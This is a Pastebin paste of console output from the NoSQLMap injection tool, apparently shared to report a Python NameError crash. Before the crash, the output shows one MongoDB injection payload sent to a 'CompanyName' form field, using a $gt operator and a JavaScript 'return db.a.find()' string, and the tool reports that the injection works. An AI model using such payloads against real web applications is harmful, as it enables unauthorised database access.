Advertisement
Guest User

Untitled

a guest
Jun 30th, 2016
217
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.71 KB | None | 0 0
  1. Injecting {'CompanyName[$gt]': '', 'CompanyName': "a'; return db.a.find(); var dummy='!"}
  2. Response varied 17660 bytes from random parameter value! Injection works!
  3. Traceback (most recent call last):
  4. File "nosqlmap.py", line 462, in <module>
  5. main()
  6. File "nosqlmap.py", line 51, in main
  7. mainMenu()
  8. File "nosqlmap.py", line 112, in mainMenu
  9. nsmweb.postApps(victim,webPort,uri,https,verb,postData,requestHeaders)
  10. File "/root/Downloads/NoSQLMap-stable/nsmweb.py", line 520, in postApps
  11. checkResult(randLength,injLen,testNum,verb)
  12. File "/root/Downloads/NoSQLMap-stable/nsmweb.py", line 780, in checkResult
  13. vulnAddrs.append(str(postData))
  14. NameError: global name 'postData' is not defined
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement